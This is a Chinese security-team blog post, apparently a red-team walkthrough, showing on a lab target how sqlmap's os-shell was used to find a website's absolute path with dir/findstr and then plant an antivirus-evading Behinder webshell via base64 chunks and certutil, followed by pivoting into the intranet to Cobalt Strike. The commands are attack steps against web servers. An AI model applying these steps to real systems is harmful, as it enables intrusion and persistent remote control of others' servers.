点击上方蓝字
关注我们
本文仅用于参考和学习交流,对于使用本文所提供的信息所造成的任何直接或间接的后果和损失,使用者需自行承担责任。本文的作者以及本公众号团队对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢!
前言
某次hvv打点遇到的,这里我用靶场作为演示为大家提供一个sqlmap注入后,找网站绝对路径的思路。
正文
前提:sqlmap注入可以使用os-shell,且为dba权限。
01
os-shell查找网站绝对路径
fsutil fsinfo drives //先看系统都有哪些盘
这里可以找一张图片然后通过find命令来寻找它的路径(这里我选择找网站的一个背景图)。
dir /a /s /b C: | findstr "loginbg.jpg" >111.txt //在C盘中查找loginbg.jpg
type 111.txt
返回空,说明网站根目录不在C盘
dir /a /s /b D: | findstr "loginbg.jpg" >111.txt //在D盘中查找loginbg.jpg
type 111.txt
成功找到目录猜测为1和2,我选择写到D:xxxContentimage目录下
。
02
os-shell写入冰蝎免杀马
1.将冰蝎webshell进行base64加密,分成4段进行传输。
2.解密冰蝎马
certutil -decode D:xxxContentimagesTest.txt D:xxxContentimagestext2.aspx
//第一个路径为写入webshell的txt绝对径,第二个路径是生成冰蝎马的路径(一定要在网站绝对路径下)
这里我之前解密过一次,所以提示文件存在。
4.连接webshell
。
03
内网
之后就是简单的传免杀马上线cs了。
好家伙,内网还有海康威视文件上传,传马,上线CS。
这里可以找一张图片然后通过find命令来寻找它的路径(这里我选择找网站的一个背景图)
。
后记
🌟 诚邀您点赞!点亮我们共同的故事,为我们的公众号加油!🔥🔥🔥
亲爱的读者,您的一个赞,对我们来说是无比的鼓励和动力。每一次点赞,都是您对我们内容的认可和支持,也是我们持续创作的动力源泉。
在点赞的同时,也请您分享我们的内容给更多的朋友,让更多的人了解我们的公众号,一起分享知识和快乐。您的支持,是我们前行的最大动力!🚀🚀🚀
让我们一起,为知识点赞,为生活点赞,为梦想点赞!🌟🌟🌟
扫码关注我们
原文始发于微信公众号(赤弋安全团队):某次hvv通过sql注入打入内网
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论